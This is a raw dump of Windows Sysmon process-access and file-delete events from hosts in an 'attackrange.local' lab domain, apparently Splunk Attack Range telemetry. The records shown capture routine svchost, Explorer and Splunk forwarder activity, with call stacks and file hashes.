08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.365{466BC892-32D3-60E8-770B-00000000CF01}63569384C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.832{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670E80EF7FE1CB86A3BBA4250686552C,SHA256=5C0ADACA0B0D30C51FB5BD6DBEBA27FE6769768FA548E1BE2E43D44709D5A0C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:36.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421FEFE1AA11A648E82E36DEBD3260F4,SHA256=7776820AA6B787A9C4CF96E1F1AC7DC4B19D550DE2C4612C834810BFEB4CBCD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.265{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.se
rviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.265{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:36.265{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63563784C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.249{466BC892-32D3-60E8-770B-00000000CF01}63563784C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 